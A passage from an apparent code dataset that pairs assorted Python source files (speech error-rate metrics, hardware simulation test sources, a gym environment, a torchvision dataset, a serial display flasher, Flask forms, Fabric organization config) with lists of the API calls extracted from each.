(n_s, n_d, n_i) = prev_ops[y - 1]
curr_ops[y] = (n_s + int(u[x - 1] != v[y - 1]), n_d, n_i)
elif curr[y] == delcost:
(n_s, n_d, n_i) = prev_ops[y]
curr_ops[y] = (n_s, n_d + 1, n_i)
else:
(n_s, n_d, n_i) = curr_ops[y - 1]
curr_ops[y] = (n_s, n_d, n_i + 1)
return curr[len(v)], curr_ops[len(v)]
def load_file(fname, encoding):
try:
f = open(fname, 'r')
data = []
for line in f:
data.append(line.rstrip('\n').rstrip('\r').decode(encoding))
f.close()
except:
logging.error('Error reading file "%s"', fname)
exit(1)
return data
def get_unicode_code(text):
result = ''.join( char if ord(char) < 128 else '\\u'+format(ord(char), 'x') for char in text )
return result
def measure(transcription=None, reference=None, input_source='str', separator='\t', encoding='utf-8'):
'''
parser = argparse.ArgumentParser(
description='Compute useful evaluation metrics (CER, WER, SER, ...)')
parser.add_argument(
'-r', '--reference', type=str, metavar='REF', default=None,
help='reference sentence or file')
parser.add_argument(
'-t', '--transcription', type=str, metavar='HYP', default=None,
help='transcription sentence or file')
parser.add_argument(
'-i', '--input_source', type=str, choices=('-', 'str', 'file'),
default='-', help=""""-" reads parallel sentences from the standard
input, "str" interprets `-r' and `-t' as sentences, and "file"
interprets `-r' and `-t' as two parallel files, with one sentence per
line (default: -)""")
parser.add_argument(
'-s', '--separator', type=str, metavar='SEP', default='\t',
help="""use this string to separate the reference and transcription
when reading from the standard input (default: \\t)""")
parser.add_argument(
'-e', '--encoding', type=str, metavar='ENC', default='utf-8',
help="""character encoding of the reference and transcription text
(default: utf-8)""")
args = parser.parse_args()
'''
if input_source != '-' and \
(reference is None or transcription is None):
logging.error('Expected reference and transcription sources')
exit(1)
ref, hyp = [], []
if input_source == 'str':
ref.append(reference)
hyp.append(transcription)
# ref.append(get_unicode_code(reference))
# hyp.append(get_unicode_code(transcription))
elif input_source == '-':
line_n = 0
for line in sys.stdin:
line_n += 1
line = line.rstrip('\n').rstrip('\r').decode(encoding)
fields = line.split(separator)
if len(fields) != 2:
logging.warning(
'Line %d has %d fields but 2 were expected',
line_n, len(fields))
continue
ref.append(fields[0])
hyp.append(fields[1])
elif input_source == 'file':
ref = load_file(reference, encoding)
hyp = load_file(transcription, encoding)
if len(ref) != len(hyp):
logging.error(
'The number of reference and transcription sentences does not '
'match (%d vs. %d)', len(ref), len(hyp))
exit(1)
else:
logging.error('INPUT FROM "%s" NOT IMPLEMENTED', input_source)
exit(1)
wer_s, wer_i, wer_d, wer_n = 0, 0, 0, 0
cer_s, cer_i, cer_d, cer_n = 0, 0, 0, 0
sen_err = 0
for n in range(len(ref)):
# update CER statistics
_, (s, i, d) = levenshtein(ref[n], hyp[n])
cer_s += s
cer_i += i
cer_d += d
cer_n += len(ref[n])
# update WER statistics
_, (s, i, d) = levenshtein(ref[n].split(), hyp[n].split())
wer_s += s
wer_i += i
wer_d += d
wer_n += len(ref[n].split())
# update SER statistics
if s + i + d > 0:
sen_err += 1
if cer_n > 0:
print('CER: %g%%, WER: %g%%, SER: %g%%' % (
(100.0 * (cer_s + cer_i + cer_d)) / cer_n,
(100.0 * (wer_s + wer_i + wer_d)) / wer_n,
(100.0 * sen_err) / len(ref)))
|
[
"logging.error",
"logging.basicConfig"
] |
[((155, 241), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s(%(filename)s:%(lineno)d): %(message)s"""'}), "(format=\n '%(levelname)s(%(filename)s:%(lineno)d): %(message)s')\n", (174, 241), False, 'import logging\n'), ((3152, 3213), 'logging.error', 'logging.error', (['"""Expected reference and transcription sources"""'], {}), "('Expected reference and transcription sources')\n", (3165, 3213), False, 'import logging\n'), ((1494, 1541), 'logging.error', 'logging.error', (['"""Error reading file "%s\\""""', 'fname'], {}), '(\'Error reading file "%s"\', fname)\n', (1507, 1541), False, 'import logging\n'), ((4292, 4354), 'logging.error', 'logging.error', (['"""INPUT FROM "%s" NOT IMPLEMENTED"""', 'input_source'], {}), '(\'INPUT FROM "%s" NOT IMPLEMENTED\', input_source)\n', (4305, 4354), False, 'import logging\n')]
|
"""
========================================================================
Test sources
========================================================================
Test sources with CL or RTL interfaces.
Author : <NAME>
Date : Mar 11, 2019
"""
from collections import deque
from pymtl3 import *
from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL
#-------------------------------------------------------------------------
# TestSrcCL
#-------------------------------------------------------------------------
class TestSrcCL( Component ):
def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ):
s.send = CallerIfcCL( Type=Type )
s.msgs = deque( msgs )
s.count = initial_delay
s.delay = interval_delay
@update_once
def up_src_send():
if s.count > 0:
s.count -= 1
elif not s.reset:
if s.send.rdy() and s.msgs:
s.send( s.msgs.popleft() )
s.count = s.delay # reset count after a message is sent
def done( s ):
return not s.msgs
# Line trace
def line_trace( s ):
return "{}".format( s.send )
#-------------------------------------------------------------------------
# TestSrcRTL
#-------------------------------------------------------------------------
# TODO: deprecating TestSrcRTL.
class TestSrcRTL( Component ):
def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ):
# Interface
s.send = SendIfcRTL( Type )
# Components
s.src = TestSrcCL( Type, msgs, initial_delay, interval_delay )
s.adapter = RecvCL2SendRTL( Type )
connect( s.src.send, s.adapter.recv )
connect( s.adapter.send, s.send )
def done( s ):
return s.src.done()
# Line trace
def line_trace( s ):
return "{}".format( s.send )
|
[
"pymtl3.stdlib.ifcs.RecvCL2SendRTL",
"pymtl3.stdlib.ifcs.SendIfcRTL",
"collections.deque"
] |
[((672, 683), 'collections.deque', 'deque', (['msgs'], {}), '(msgs)\n', (677, 683), False, 'from collections import deque\n'), ((1435, 1451), 'pymtl3.stdlib.ifcs.SendIfcRTL', 'SendIfcRTL', (['Type'], {}), '(Type)\n', (1445, 1451), False, 'from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL\n'), ((1560, 1580), 'pymtl3.stdlib.ifcs.RecvCL2SendRTL', 'RecvCL2SendRTL', (['Type'], {}), '(Type)\n', (1574, 1580), False, 'from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL\n')]
|
import gym
from typing import List, Tuple, Dict
import numpy as np
from gym import spaces
from core.simulation import Simulation
from service import global_constants
class JsbsimGymEnvironmentWrapper(gym.Env):
"""Custom Environment that follows gym interface"""
metadata = {'render.modes': ['human']}
def __init__(self, configuration_path: str=global_constants.DEFAULT_CONFIGURATION_PATH):
super(JsbsimGymEnvironmentWrapper, self).__init__()
self.sim = Simulation(configuration_path=configuration_path)
self._dimensions = 1
self.action_space = spaces.Box(
low=-0,
high=1,
shape=(self._dimensions,),
dtype=np.float32
)
self.observation_space = spaces.Box(
low=np.inf,
high=np.inf,
shape=self._getObs().shape, # Passt sich damit automatisch an die Beobachtung an
dtype=np.float32
)
def reset(self):
self.sim.reset_with_initial_condition()
return self._getObs(), self._calcRewards(), self._calcDones(), {}
def step(self, actions: List[np.ndarray]) -> Tuple[np.ndarray, np.ndarray, np.ndarray, Dict]:
self.sim.set_properties('fcs/throttle-cmd-norm', actions[0])
self.sim.run()
return self._getObs(), self._calcRewards(), self._calcDones(), {}
def _getObs(self) -> np.ndarray:
state = self.sim.get_state()
return np.array(list(state.values()))
def _calcRewards(self) -> np.ndarray:
rewAgent0 = 0
return np.array([rewAgent0], dtype=np.float32)
def _calcDones(self) -> np.ndarray:
dones = np.zeros(1)
return dones
def render(self, mode='human'):
pass
def close(self):
pass
def seed(self, seed=None) -> None:
pass
if __name__ == "__main__":
env = JsbsimGymEnvironmentWrapper()
ob = env.reset()
action = env.action_space.sample()
for _ in range(10):
print(env.step(action))
|
[
"numpy.zeros",
"numpy.array",
"gym.spaces.Box",
"core.simulation.Simulation"
] |
[((482, 531), 'core.simulation.Simulation', 'Simulation', ([], {'configuration_path': 'configuration_path'}), '(configuration_path=configuration_path)\n', (492, 531), False, 'from core.simulation import Simulation\n'), ((589, 660), 'gym.spaces.Box', 'spaces.Box', ([], {'low': '(-0)', 'high': '(1)', 'shape': '(self._dimensions,)', 'dtype': 'np.float32'}), '(low=-0, high=1, shape=(self._dimensions,), dtype=np.float32)\n', (599, 660), False, 'from gym import spaces\n'), ((1556, 1595), 'numpy.array', 'np.array', (['[rewAgent0]'], {'dtype': 'np.float32'}), '([rewAgent0], dtype=np.float32)\n', (1564, 1595), True, 'import numpy as np\n'), ((1653, 1664), 'numpy.zeros', 'np.zeros', (['(1)'], {}), '(1)\n', (1661, 1664), True, 'import numpy as np\n')]
|
import functools
import io
from typing import Any, Callable, Dict, List, Optional, Tuple
import torch
from torchdata.datapipes.iter import (
IterDataPipe,
Mapper,
CSVParser,
)
from torchvision.prototype.datasets.decoder import raw
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
HttpResource,
OnlineResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import image_buffer_from_array, hint_sharding, hint_shuffling
from torchvision.prototype.features import Image, Label
class SEMEION(Dataset):
def _make_info(self) -> DatasetInfo:
return DatasetInfo(
"semeion",
type=DatasetType.RAW,
categories=10,
homepage="https://archive.ics.uci.edu/ml/datasets/Semeion+Handwritten+Digit",
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
data = HttpResource(
"http://archive.ics.uci.edu/ml/machine-learning-databases/semeion/semeion.data",
sha256="f43228ae3da5ea6a3c95069d53450b86166770e3b719dcc333182128fe08d4b1",
)
return [data]
def _collate_and_decode_sample(
self,
data: Tuple[str, ...],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
image_data = torch.tensor([float(pixel) for pixel in data[:256]], dtype=torch.uint8).reshape(16, 16)
label_data = [int(label) for label in data[256:] if label]
if decoder is raw:
image = Image(image_data.unsqueeze(0))
else:
image_buffer = image_buffer_from_array(image_data.numpy())
image = decoder(image_buffer) if decoder else image_buffer # type: ignore[assignment]
label_idx = next((idx for idx, one_hot_label in enumerate(label_data) if one_hot_label))
return dict(image=image, label=Label(label_idx, category=self.info.categories[label_idx]))
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
dp = resource_dps[0]
dp = CSVParser(dp, delimiter=" ")
dp = hint_sharding(dp)
dp = hint_shuffling(dp)
dp = Mapper(dp, functools.partial(self._collate_and_decode_sample, decoder=decoder))
return dp
|
[
"functools.partial",
"torchvision.prototype.datasets.utils.HttpResource",
"torchvision.prototype.datasets.utils._internal.hint_shuffling",
"torchdata.datapipes.iter.CSVParser",
"torchvision.prototype.datasets.utils.DatasetInfo",
"torchvision.prototype.datasets.utils._internal.hint_sharding",
"torchvision.prototype.features.Label"
] |
[((653, 795), 'torchvision.prototype.datasets.utils.DatasetInfo', 'DatasetInfo', (['"""semeion"""'], {'type': 'DatasetType.RAW', 'categories': '(10)', 'homepage': '"""https://archive.ics.uci.edu/ml/datasets/Semeion+Handwritten+Digit"""'}), "('semeion', type=DatasetType.RAW, categories=10, homepage=\n 'https://archive.ics.uci.edu/ml/datasets/Semeion+Handwritten+Digit')\n", (664, 795), False, 'from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource, DatasetType\n'), ((938, 1121), 'torchvision.prototype.datasets.utils.HttpResource', 'HttpResource', (['"""http://archive.ics.uci.edu/ml/machine-learning-databases/semeion/semeion.data"""'], {'sha256': '"""f43228ae3da5ea6a3c95069d53450b86166770e3b719dcc333182128fe08d4b1"""'}), "(\n 'http://archive.ics.uci.edu/ml/machine-learning-databases/semeion/semeion.data'\n , sha256='f43228ae3da5ea6a3c95069d53450b86166770e3b719dcc333182128fe08d4b1'\n )\n", (950, 1121), False, 'from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource, DatasetType\n'), ((2250, 2278), 'torchdata.datapipes.iter.CSVParser', 'CSVParser', (['dp'], {'delimiter': '""" """'}), "(dp, delimiter=' ')\n", (2259, 2278), False, 'from torchdata.datapipes.iter import IterDataPipe, Mapper, CSVParser\n'), ((2292, 2309), 'torchvision.prototype.datasets.utils._internal.hint_sharding', 'hint_sharding', (['dp'], {}), '(dp)\n', (2305, 2309), False, 'from torchvision.prototype.datasets.utils._internal import image_buffer_from_array, hint_sharding, hint_shuffling\n'), ((2323, 2341), 'torchvision.prototype.datasets.utils._internal.hint_shuffling', 'hint_shuffling', (['dp'], {}), '(dp)\n', (2337, 2341), False, 'from torchvision.prototype.datasets.utils._internal import image_buffer_from_array, hint_sharding, hint_shuffling\n'), ((2366, 2433), 'functools.partial', 'functools.partial', (['self._collate_and_decode_sample'], {'decoder': 'decoder'}), '(self._collate_and_decode_sample, decoder=decoder)\n', (2383, 2433), False, 'import functools\n'), ((1922, 1980), 'torchvision.prototype.features.Label', 'Label', (['label_idx'], {'category': 'self.info.categories[label_idx]'}), '(label_idx, category=self.info.categories[label_idx])\n', (1927, 1980), False, 'from torchvision.prototype.features import Image, Label\n')]
|
import pegtree as pg
from pegtree import ParseTree
from pegtree.visitor import ParseTreeVisitor
import tree as ntree
import pprint
peg = pg.grammar('multiese.pegtree')
parser = pg.generate(peg)
def fix(tree):
a = [tree.epos_]
for t in tree:
fix(t)
a.append(t.epos_)
for key in tree.keys():
a.append(fix(tree.get(key)).epos_)
tree.epos_ = max(a)
return tree
class MultieseParser(ParseTreeVisitor):
def __init__(self):
ParseTreeVisitor.__init__(self)
def parse(self, s: str):
tree = parser(s)
node = self.visit(tree)
return node
def acceptChunk(self, tree: ParseTree):
s = str(tree)
node = ntree.parse(s)
return ntree.系列(*node.flatten()).simplify()
def acceptSeq(self, tree: ParseTree):
ns = []
# print(repr(tree))
for t in tree:
node = self.visit(t)
node.flatten(ns)
return ntree.系列(*ns)
def acceptBlock(self, tree: ParseTree):
# print(repr(tree)) (1+2)*3
return ntree.グループ(self.visit(tree[0]))
def acceptChoice(self, tree: ParseTree):
ns = []
for t in tree:
ns.append(self.visit(t))
node = ntree.Choice(ns)
if ns[0].__class__.__name__ != '助詞':
ntree.update_choice_dic(node.stringfy()) # 類義語辞書を更新する
return node
def acceptExpression(self, tree: ParseTree):
s = str(fix(tree))
return ntree.コード(s)
def acceptSymbol(self, tree: ParseTree):
s = str(fix(tree))
return ntree.コード(s)
def acceptAnnotation(self, tree: ParseTree):
name = str(tree[0]) # アノテーション種類
ns = [self.visit(t) for t in tree[1:]]
return ntree.annotation(name, ns)
mult = MultieseParser()
def multiese_parser(s: str):
return mult.parse(s)
def test_for_nobu(s):
print(s)
print('=>', repr(mult.parse(s)))
print()
if __name__ == '__main__':
test_for_nobu('データフレームdfを降順にソートする')
test_for_nobu('望遠鏡で泳ぐ子犬を見た')
test_for_nobu('望遠鏡で{泳ぐ子犬}を見た')
test_for_nobu('望遠鏡で[子犬|とうきび]を見た')
test_for_nobu('@type(df, データフレーム)について、望遠鏡で子犬を見てない') # 否 見た 80%
test_for_nobu('@type(df)の先頭を見る') # Keyword
test_for_nobu('望遠鏡で{子犬が泳ぐ}様子を見たら、math.pi+1を実行する')
|
[
"tree.Choice",
"tree.annotation",
"pegtree.visitor.ParseTreeVisitor.__init__",
"tree.parse",
"pegtree.grammar",
"tree.系列",
"pegtree.generate",
"tree.コード"
] |
[((138, 168), 'pegtree.grammar', 'pg.grammar', (['"""multiese.pegtree"""'], {}), "('multiese.pegtree')\n", (148, 168), True, 'import pegtree as pg\n'), ((178, 194), 'pegtree.generate', 'pg.generate', (['peg'], {}), '(peg)\n', (189, 194), True, 'import pegtree as pg\n'), ((478, 509), 'pegtree.visitor.ParseTreeVisitor.__init__', 'ParseTreeVisitor.__init__', (['self'], {}), '(self)\n', (503, 509), False, 'from pegtree.visitor import ParseTreeVisitor\n'), ((699, 713), 'tree.parse', 'ntree.parse', (['s'], {}), '(s)\n', (710, 713), True, 'import tree as ntree\n'), ((953, 966), 'tree.系列', 'ntree.系列', (['*ns'], {}), '(*ns)\n', (961, 966), True, 'import tree as ntree\n'), ((1232, 1248), 'tree.Choice', 'ntree.Choice', (['ns'], {}), '(ns)\n', (1244, 1248), True, 'import tree as ntree\n'), ((1473, 1485), 'tree.コード', 'ntree.コード', (['s'], {}), '(s)\n', (1482, 1485), True, 'import tree as ntree\n'), ((1574, 1586), 'tree.コード', 'ntree.コード', (['s'], {}), '(s)\n', (1583, 1586), True, 'import tree as ntree\n'), ((1740, 1766), 'tree.annotation', 'ntree.annotation', (['name', 'ns'], {}), '(name, ns)\n', (1756, 1766), True, 'import tree as ntree\n')]
|
# _ _ _
# / \ _ __ __| (_)_ __ ___ _ __ _ _
# / _ \ | '_ \ / _` | | '_ \ / _ \| '_ \| | | |
# / ___ \| | | | (_| | | | | | (_) | |_) | |_| |
# /_/ \_\_| |_|\__,_|_|_| |_|\___/| .__/ \__, |
# |_| |___/
# by <NAME>
import time
import serial
import sys
import os
e = bytearray([0xFF, 0xFF, 0xFF])
def get_baud_rate(dev_port: serial.Serial, diagnostics: bool = False):
def diag_print(text: str):
if diagnostics:
print(text)
for baud_rate in (2400, 4800, 9600, 19200, 38400, 57600, 115200, 921600, 512000, 256000, 250000, 230400):
dev_port.baudrate = baud_rate
dev_port.timeout = 3000 / baud_rate + 0.2
diag_print(f"trying with {baud_rate} baud")
dev_port.write(e)
dev_port.write("connect".encode('ascii'))
dev_port.write(e)
r = dev_port.read(128)[:-3]
if 'comok' in str(r):
diag_print(f"Connected with {baud_rate} baud")
status, unknown1, model, firmware, mcucode, nextion_serial, nextion_flash_size = str(r).strip("\xff").split(
',')
if status.split(' ')[1] == "1":
diag_print('Touchscreen: enabled')
else:
diag_print('Touchscreen: disabled')
diag_print(
f"Model:{model}\nFirmware:{firmware}\nMCU-Code:{mcucode}\nSerial:{nextion_serial}\nFlashSize:{nextion_flash_size}")
return baud_rate
return False
def force_max_baud(dev_port, filesize, diagnostics=False):
def diag_print(text: str):
if diagnostics:
print(text)
for baud in [921600, 512000, 256000, 250000, 230400, 115200, 57600, 38400, 31250, 19200, 9600]:
diag_print(f"Trying {baud} baud")
diag_print(f"SENDING: whmi-wri {filesize},{baud},0")
dev_port.write(f"whmi-wri {filesize},{baud},0".encode("ascii"))
dev_port.write(e)
time.sleep(0.4)
dev_port.baudrate = baud
dev_port.timeout = 0.5
time.sleep(.1)
r = dev_port.read(1)
if 0x05 in r:
return True
return False
def upload_image(dev_port, filename, filesize):
with open(filename, 'rb') as image:
data_count = 0
while 1:
data = image.read(4096)
if len(data) < 1:
break
data_count += len(data)
dev_port.timeout = 5
dev_port.write(data)
sys.stdout.write('\rUpload, %3.1f%%...' % (data_count / float(filesize) * 100.0))
sys.stdout.flush()
time.sleep(.5)
r = dev_port.read(1)
if 0x05 not in r:
return False
return True
def flash(port: str, tft_file: str):
port = serial.Serial(port, 9600, timeout=None)
if not port.isOpen():
port.open()
if not get_baud_rate(port, diagnostics=True):
print("Baud Rate could not be specified")
exit(1)
file_size = os.path.getsize(tft_file)
if not force_max_baud(port, file_size, diagnostics=True):
print("Could not force baud rate")
exit(1)
if not upload_image(port, tft_file, file_size):
print("could not upload tft File")
exit(1)
if __name__ == "__main__":
if len(sys.argv) != 2:
print('usage:\npython3 nextion_util.py file_to_upload.tft')
file = sys.argv[1]
flash("/dev/ttyAMA0", file)
exit(0)
|
[
"serial.Serial",
"os.path.getsize",
"sys.stdout.flush",
"time.sleep"
] |
[((2793, 2832), 'serial.Serial', 'serial.Serial', (['port', '(9600)'], {'timeout': 'None'}), '(port, 9600, timeout=None)\n', (2806, 2832), False, 'import serial\n'), ((3011, 3036), 'os.path.getsize', 'os.path.getsize', (['tft_file'], {}), '(tft_file)\n', (3026, 3036), False, 'import os\n'), ((1968, 1983), 'time.sleep', 'time.sleep', (['(0.4)'], {}), '(0.4)\n', (1978, 1983), False, 'import time\n'), ((2056, 2071), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2066, 2071), False, 'import time\n'), ((2589, 2607), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2605, 2607), False, 'import sys\n'), ((2620, 2635), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (2630, 2635), False, 'import time\n')]
|
#
# Copyright 2015 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
from strabo.connection import StraboConnection
from strabo.location import Location, LocationSet
import unittest
import os
TEST_DIR = os.path.dirname(os.path.realpath(__file__))
class UploadTest(unittest.TestCase):
def test_simple_upload(self):
response = Location(2, 20).nearest_neighbors(self.set1, 1).run()
self.assertEquals(response, {'result': [{'lat': 0.11, 'lon': 10.22}]})
def test_location_set_map(self):
response = self.set1.map(lambda x: x.nearest_neighbor(self.set2)).run()
self.assertTrue('result' in response)
self.assertItemsEqual(response['result'], [{'lat': 31.0, 'lon': -120.01},
{'lat': -2.0, 'lon': 8.0}])
def setUp(self):
self.set1 = LocationSet(filename =
os.path.join(TEST_DIR, 'testdata', 'upload_locations_test.csv'),
id_column = 'id',
lat_column = 'lat',
lon_column = 'lon')
self.set2 = LocationSet(filename =
os.path.join(TEST_DIR, 'testdata', 'second_test_location_set.csv'),
id_column = 'point_id',
lat_column = 'latitude',
lon_column = 'longitude')
def tearDown(self):
self.assertEquals(self.set1.clear().run(), {'result': {"num_rows_affected": 2}})
self.assertEquals(self.set2.clear().run(), {'result': {"num_rows_affected": 3}})
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"os.path.realpath",
"strabo.location.Location",
"os.path.join"
] |
[((815, 841), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (831, 841), False, 'import os\n'), ((2225, 2240), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2238, 2240), False, 'import unittest\n'), ((1473, 1536), 'os.path.join', 'os.path.join', (['TEST_DIR', '"""testdata"""', '"""upload_locations_test.csv"""'], {}), "(TEST_DIR, 'testdata', 'upload_locations_test.csv')\n", (1485, 1536), False, 'import os\n'), ((1751, 1817), 'os.path.join', 'os.path.join', (['TEST_DIR', '"""testdata"""', '"""second_test_location_set.csv"""'], {}), "(TEST_DIR, 'testdata', 'second_test_location_set.csv')\n", (1763, 1817), False, 'import os\n'), ((934, 949), 'strabo.location.Location', 'Location', (['(2)', '(20)'], {}), '(2, 20)\n', (942, 949), False, 'from strabo.location import Location, LocationSet\n')]
|
#!/usr/bin/env python3
# coding=UTF-8
import os
import sys
import shutil
import ConfigParser
from logger import *
def generate_workspace(config, info):
cwd = os.path.abspath(os.getcwd())
ws_dir = cwd + '/' + info['contest_id'] + info['problem_id']
sample_dir = ws_dir + '/sample'
if os.path.isdir(ws_dir):
fatal('Directory {} do exist, exit.'.format(os.path.basename(ws_dir)))
os.mkdir(ws_dir)
if config:
template_file = os.path.expandvars(config.get('wtf_cf', 'template_file'))
shutil.copy(template_file, ws_dir + '/solution.' + config.get('wtf_cf', 'template_suffix'))
os.mkdir(sample_dir)
for (index, sample) in enumerate(info['test_samples']):
with open(sample_dir + '/' + str(index) + '.in', 'w') as in_file:
in_file.write(sample['input'])
with open(sample_dir + '/' + str(index) + '.out', 'w') as out_file:
out_file.write(sample['output'])
conf = info
conf['samples'] = len(info['test_samples'])
conf['test_samples'] = None
conf['compile_command'] = config.get('wtf_cf', 'compile_command') if config else 'echo "There\'s no global config file." && exit -1'
config_file = ConfigParser.ConfigParser()
config_file.add_section('project')
for (key, value) in conf.items():
if value:
config_file.set('project', key, value)
config_file.set('project', 'solution', 'solution.' + (config.get('wtf_cf', 'template_suffix') if config else 'cxx'))
with open(ws_dir + '/config.ini', 'w') as file:
config_file.write(file)
|
[
"os.mkdir",
"os.path.basename",
"os.path.isdir",
"os.getcwd",
"ConfigParser.ConfigParser"
] |
[((309, 330), 'os.path.isdir', 'os.path.isdir', (['ws_dir'], {}), '(ws_dir)\n', (322, 330), False, 'import os\n'), ((416, 432), 'os.mkdir', 'os.mkdir', (['ws_dir'], {}), '(ws_dir)\n', (424, 432), False, 'import os\n'), ((636, 656), 'os.mkdir', 'os.mkdir', (['sample_dir'], {}), '(sample_dir)\n', (644, 656), False, 'import os\n'), ((1210, 1237), 'ConfigParser.ConfigParser', 'ConfigParser.ConfigParser', ([], {}), '()\n', (1235, 1237), False, 'import ConfigParser\n'), ((183, 194), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (192, 194), False, 'import os\n'), ((384, 408), 'os.path.basename', 'os.path.basename', (['ws_dir'], {}), '(ws_dir)\n', (400, 408), False, 'import os\n')]
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, EqualTo, Email
# Form for address
class AddressForm(FlaskForm):
address = StringField('Address',validators=[DataRequired()])
submit = SubmitField('Submit')
# Form for email notifications
class EmailForm(FlaskForm):
fullName = StringField('<NAME>',validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
address = StringField('Address',validators=[DataRequired()])
submit = SubmitField('Sign Up')
|
[
"wtforms.SubmitField",
"wtforms.validators.DataRequired",
"wtforms.validators.Email"
] |
[((272, 293), 'wtforms.SubmitField', 'SubmitField', (['"""Submit"""'], {}), "('Submit')\n", (283, 293), False, 'from wtforms import StringField, SubmitField\n'), ((579, 601), 'wtforms.SubmitField', 'SubmitField', (['"""Sign Up"""'], {}), "('Sign Up')\n", (590, 601), False, 'from wtforms import StringField, SubmitField\n'), ((241, 255), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (253, 255), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((410, 424), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (422, 424), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((473, 487), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (485, 487), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((489, 496), 'wtforms.validators.Email', 'Email', ([], {}), '()\n', (494, 496), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((548, 562), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (560, 562), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n')]
|
# -*- encoding: utf-8 -*-
#
# Copyright 2020 Yiwenlong(<EMAIL>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import yaml
from orgconfig.msp import static_msp_support
from orgconfig.deploy import deploy_builder
from utils.fileutil import mkdir_if_need
KEY_ORGANIZATIONS = "Organizations"
KEY_PEERS = "Peers"
KEY_ORDERERS = "Orderers"
KEY_NAME = "Name"
class Node(dict):
def __getattr__(self, item):
return self[item]
def __init__(self, org, msp_holder, deploy_build, **values):
super(Node, self).__init__()
self.update(values)
self.Org = org
self.Domain = "%s.%s" % (self.Name, self.Org.Domain)
self.msp_holder = msp_holder
self.deploy_handler = deploy_build(self, self.Org.Dir)
self.FullName = "%s.%s" % (self.Org.Name, self.Name)
class Organization(dict):
def __getattr__(self, item):
return self[item]
def __init__(self, target_dir, msp_support=static_msp_support, **values):
super().__init__()
self.update(values)
self.logger = logging.getLogger("organization")
self.Dir = os.path.join(target_dir, self.Name)
mkdir_if_need(self.Dir)
self.msp_support = msp_support(self)
self.logger.debug("Config organization: %s, mspid: %s" % (self.Name, self.MSPID))
self.logger.debug("\tOrganization directory: %s" % self.Dir)
self.msp_support.create_msp()
msp_holder = self.msp_support.msp_holder
self.PeerNodes = {n[KEY_NAME]: Node(self, msp_holder.node_msp_holder(n[KEY_NAME]), deploy_builder("Peer"), **n)
for n in self.Peers}
self.OrdererNodes = {o[KEY_NAME]: Node(self, msp_holder.node_msp_holder(o[KEY_NAME]), deploy_builder("Orderer"), **o)
for o in self.Orderers}
def deploy_peers(self):
for peer in self.PeerNodes.values():
peer.deploy_handler.deploy()
def deploy_orderers(self, genesis_block):
for orderer in self.OrdererNodes.values():
orderer.deploy_handler.deploy(genesis_block)
def msp_dir(self):
return self.msp_support.msp_holder.org_msp_dir
def admin(self):
return self.msp_support.msp_holder.admin_msp_holder()
def default_endorser(self):
for peer in self.PeerNodes.values():
return peer
def tree_walk_peers(self, invoke_func):
for peer in self.PeerNodes.values():
invoke_func(peer)
def config_organizations(raw_conf, target_dir):
return {org["Name"]: Organization(target_dir, **org) for org in raw_conf}
def find_node(org_map, node):
org_name, node_name = str(node).split(".")
if org_name not in org_map:
raise ValueError("Organization not found: %s" % org_name)
org = org_map[org_name]
if node_name in org.PeerNodes:
return org.PeerNodes[node_name]
if node_name in org.OrdererNodes:
return org.OrdererNodes[node_name]
raise ValueError("Node not found: %s" % node)
def find_user(org_map, user):
org_name, user_name = str(user).split(".")
if org_name not in org_map:
raise ValueError("Organization not found: %s" % org_name)
org = org_map[org_name]
return org.msp_support.msp_holder.user_msp_holder(user_name)
|
[
"orgconfig.deploy.deploy_builder",
"os.path.join",
"logging.getLogger",
"utils.fileutil.mkdir_if_need"
] |
